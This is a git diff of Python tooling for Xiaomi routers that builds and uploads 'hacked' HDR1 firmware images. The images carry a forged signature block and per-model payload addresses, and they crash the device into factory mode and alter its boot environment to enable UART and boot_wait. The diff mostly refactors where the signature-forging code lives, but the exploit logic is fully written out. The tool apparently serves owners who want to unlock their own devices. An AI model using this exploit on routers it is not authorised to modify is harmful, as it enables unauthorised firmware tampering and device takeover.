diff --git a/connect3.py b/connect3.py index 70ae92f..0ba4761 100644 --- a/connect3.py +++ b/connect3.py @@ -10,6 +10,7 @@ import ctypes import hashlib import binascii import re +import requests sys.path.append(os.path.dirname(os.path.abspath(__file__))) from xqimage import * @@ -38,46 +39,12 @@ class ExFlasher(): devinf = None syslog = None - def __init__(self, gw): + def __init__(self, gw, ext = 'bin'): self.gw = gw + self.ext = ext self.devinf = DevInfo(gw, verbose = 0, infolevel = 0) - self.syslog = SysLog(gw, timeout = 17, verbose = 1, infolevel = 2) - - def build_sign(self, model): - def i2b(value): - return value.to_bytes(4, byteorder='little') - model = model.upper() - payload = None - if model == "R3G": - poffset = 0x1058 - payload = i2b(0x416078) + i2b(0) + i2b(0) + i2b(0x402810) - if model == "RA69": - poffset = 0x1070 - payload = i2b(0x4152A8) + i2b(0) + i2b(0x402634) + i2b(0) - if model == "RA70": - poffset = 0x1078 - payload = i2b(0x4152D0) + i2b(0) + i2b(0x40265C) + i2b(0) - if model == "RA72": - poffset = 0x1078 - payload = i2b(0x4152E0) + i2b(0) + i2b(0x402630) + i2b(0) - if model == "R3600": - poffset = 0x1070 - payload = i2b(0x415290) + i2b(0) + i2b(0x402634) + i2b(0) - if model == "RB03": - poffset = 0x1078 - payload = i2b(0x4148B0) + i2b(0) + i2b(0x40263C) + i2b(0) - if not payload: - die('Payload is not defined for device "{}".'.format(model)) - # add header of sign section (16 bytes) - sign = i2b(poffset) + (b'\x00' * 12) - # add fake sign - size = poffset - len(payload) - for i in range(0, size, 4): - sign += (0xEAA00000 + i).to_bytes(4, byteorder='little') - # add payload - sign += payload - return sign - + self.syslog = SysLog(gw, timeout = 22, verbose = 1, infolevel = 2) + def get_bdata_env(self, syslog = None, verbose = 1): syslog = syslog if syslog is not None else self.syslog syslog.verbose = verbose @@ -94,10 +61,22 @@ class ExFlasher(): bdata.var['wl1_ssid'] = facinfo['wl1_ssid'] return bdata + def create_crash_image(self, mtd, prefix, outfilename): + crash = types.SimpleNamespace() + crash.mtd = mtd + if prefix is None: + prefix = b'' + crash.buf = bytearray(prefix + b'\xFF' * (mtd.size - len(prefix))) + crash.img = XQImage(self.gw.device_name) + crash.img.add_version(self.gw.rom_version) + crash.img.add_file(crash.buf, 'crash.bin', mtd = mtd.id) + crash.img.save_image(outfilename) + print('Created hacked image file: "{}"'.format(outfilename)) + return crash + def create_hack_images(self): imgdict = {} dn = self.gw.device_name - signature = self.build_sign(dn) bdata = self.get_bdata_env(verbose = 2) bdata.var['boot_wait'] = "on" bdata.var['uart_en'] = "1" @@ -122,50 +101,43 @@ class ExFlasher(): if not crash_mtd: die('MTD partition "{}" not found!'.format(partname)) - def create_crash_image(mtd, prefix, outfilename): - crash = types.SimpleNamespace() - crash.mtd = mtd - if prefix is None: - prefix = b'' - crash.buf = bytearray(prefix + b'\xFF' * (mtd.size - len(prefix))) - crash.img = XQImage(self.gw.device_name) - crash.img.add_version(self.gw.rom_version) - crash.img.add_file(crash.buf, 'crash.bin', mtd = mtd.id) - crash.img.save_image(signature, outfilename) - print('Created hacked image file: "{}"'.format(outfilename)) - return crash - # image for activate "factory mode" via uboot (insert factory_mode=1 into kernel cmdline) - imgdict['crash1'] = 'outdir/image_{device}_1_crash.bin'.format(device = dn) - crash1 = create_crash_image(crash_mtd, b'\xA5\x5A\x00\x00', imgdict['crash1']) + imgdict['crash1'] = 'outdir/image_{device}_1_crash.{ext}'.format(device = dn, ext = self.ext) + crash1 = self.create_crash_image(crash_mtd, b'\xA5\x5A\x00\x00', imgdict['crash1']) # image for change BData environment - imgdict['bdata'] = 'outdir/image_{device}_2_bdata.bin'.format(device = dn) - bdata.img.save_image(signature, imgdict['bdata']) + imgdict['bdata'] = 'outdir/image_{device}_2_bdata.{ext}'.format(device = dn, ext = self.ext) + bdata.img.save_image(imgdict['bdata']) print('Created hacked image file: "{}"'.format(imgdict['bdata'])) # image for deactivate "factory mode" via uboot - imgdict['crash3'] = 'outdir/image_{device}_3_crash.bin'.format(device = dn) - crash3 = create_crash_image(crash_mtd, None, imgdict['crash3']) + imgdict['crash3'] = 'outdir/image_{device}_3_crash.{ext}'.format(device = dn, ext = self.ext) + crash3 = self.create_crash_image(crash_mtd, None, imgdict['crash3']) # image for testing (debug) - #fn_test = 'outdir/image_{device}_test.bin'.format(device = dn) - #test = create_crash_image(crash_mtd, b'TEST_DEBUG', fn_test) + #fn_test = 'outdir/image_{device}_test.{ext}'.format(device = dn, ext = self.ext) + #test = self.create_crash_image(crash_mtd, b'TEST_DEBUG', fn_test) return imgdict - def upload_rom(self, filename, timeout=6): + def upload_rom(self, filename, timeout=6, verbose = 1): + self.upload_res = None if not self.gw.stok: self.gw.web_login() - print('Upload HDR1 image "{}" to device ...'.format(filename)) + if verbose: + print('Upload HDR1 image "{}" to device ...'.format(filename)) ok = False try: res = requests.post(self.gw.apiurl + "xqsystem/upload_rom", files={"image":open(filename, 'rb')}, timeout=4) - print('Response:', res.text) + self.upload_res = res + if verbose: + print('Response:', res.text) except requests.exceptions.Timeout as e: ok = True - print('The hacked image has been successfully exploited. The device reboots...') - if not self.gw.wait_shutdown(timeout): - die('The hacked image "{}" did not trigger a reboot.'.format(filename)) + if verbose: + print('The hacked image has been successfully exploited. The device reboots...') + if timeout > 0: + if not self.gw.wait_shutdown(timeout): + die('The hacked image "{}" did not trigger a reboot.'.format(filename)) #print('Device not responding.') return True diff --git a/xqimage.py b/xqimage.py index 2951d8d..1ab56f2 100644 --- a/xqimage.py +++ b/xqimage.py @@ -56,7 +56,7 @@ xqModelList = [ "R2200", "R2350", # 27 "IR1200G", - "R1800", + "RM1800", "R2100D", # 30 "RA67", "RA69", @@ -75,8 +75,8 @@ xqModelList = [ "RA82", "RA83", "RA74", - "", - "YY01", + "", + "YY01", "RB01", # 50 "RB03" # 51 ] @@ -91,26 +91,17 @@ def get_modelid_by_name(name): class XQImage(): model = None type = 0 - header = XQImgHdr() version = None files = [] # list of files - def __init__(self, model = None, type = 0): - self.model = None - self.type = 0 + def __init__(self, model, type = 0): + self.model = model.upper() + self.type = type self.header = XQImgHdr() self.version = None self.files = [] - if model is None: - self.model = None - else: - if isinstance(model, int): - self.model = model - else: - self.model = get_modelid_by_name(model) - self.type = type - def add_version(self, version, hardware = 0, channel = 'release'): + def add_version(self, version, channel = 'release'): self.version = None if version is None: return @@ -118,14 +109,8 @@ class XQImage(): data += "\t" + "option ROM '{}'\n".format(version) if channel: data += "\t" + "option CHANNEL '{}'\n".format(channel.lower()) - if hardware is not None: - if isinstance(hardware, int): - if hardware == 0 and self.model: - hardware = xqModelList[self.model] - else: - hardware = xqModelList[hardware] - data += "\t" + "option HARDWARE '{}'\n".format(hardware.upper()) - self.version = data.encode('ascii') + data += "\t" + "option HARDWARE '{}'\n".format(self.model) + self.version = data.encode('latin_1') if len(self.version) & 3 != 0: self.version += b'\x00' * (4 - len(self.version) & 3) self.add_file(self.version, 'xiaoqiang_version') @@ -140,36 +125,69 @@ class XQImage(): file.header.size = len(data) file.header.mtd = 0xFFFF if mtd is None else mtd file.header.dummy = 0 - file.header.name = name.encode('ascii') + file.header.name = name.encode('latin_1') self.files.append(file) - def get_image(self, sign): + def build_image(self, sign = None): buf = bytearray() self.header = XQImgHdr() self.header.magic = int.from_bytes(b'HDR1', byteorder='little') self.header.sign = 0 self.header.crc32 = 0 self.header.type = self.type - self.header.model = self.model + self.header.model = get_modelid_by_name(self.model) buf += bytes(self.header) for i, f in enumerate(self.files): self.header.files[i] = len(buf) buf += bytes(f.header) buf += f.data self.header.sign = len(buf) - buf += sign - for i in range(ctypes.sizeof(self.header)): - buf[i] = bytes(self.header)[i] + if sign: + buf += sign + else: + buf += self.build_sign() + self.header.crc32 = 0 + buf[:ctypes.sizeof(self.header)] = bytes(self.header) self.header.crc32 = 0xFFFFFFFF - binascii.crc32(buf[12:]) # JAMCRC - for i in range(12): - buf[i] = bytes(self.header)[i] + buf[:ctypes.sizeof(self.header)] = bytes(self.header) return buf - def save_image(self, sign, filename): + def save_image(self, filename, sign = None): self.outfilename = filename - buf = self.get_image(sign) + buf = self.build_image(sign) with open(filename, 'wb') as file: file.write(buf) - - - + + def build_sign(self): + def i2b(value): + return value.to_bytes(4, byteorder='little') + payload = None + if self.model == "R3G": + poffset = 0x1058 + payload = i2b(0x416078) + i2b(0) + i2b(0) + i2b(0x402810) + if self.model == "R3600": # AX3600 + poffset = 0x1070 + payload = i2b(0x415290) + i2b(0) + i2b(0x402634) + i2b(0) + if self.model == "RA69": # AX6 + poffset = 0x1070 + payload = i2b(0x4152A8) + i2b(0) + i2b(0x402634) + i2b(0) + if self.model == "RA70": # AX9000 + poffset = 0x1078 + payload = i2b(0x4152D0) + i2b(0) + i2b(0x40265C) + i2b(0) + if self.model == "RA72": # AX6000 + poffset = 0x1078 + payload = i2b(0x4152E0) + i2b(0) + i2b(0x402630) + i2b(0) + if not payload: + raise OSError('HDR1 Payload is not defined for device "{}".'.format(self.model)) + # add header of sign section (16 bytes) + sign = i2b(poffset) + (b'\x00' * 12) + # add fake sign + size = poffset - len(payload) + for i in range(0, size, 4): + sign += (0xEAA00000 + i).to_bytes(4, byteorder='little') + # add payload + sign += payload + return sign + + +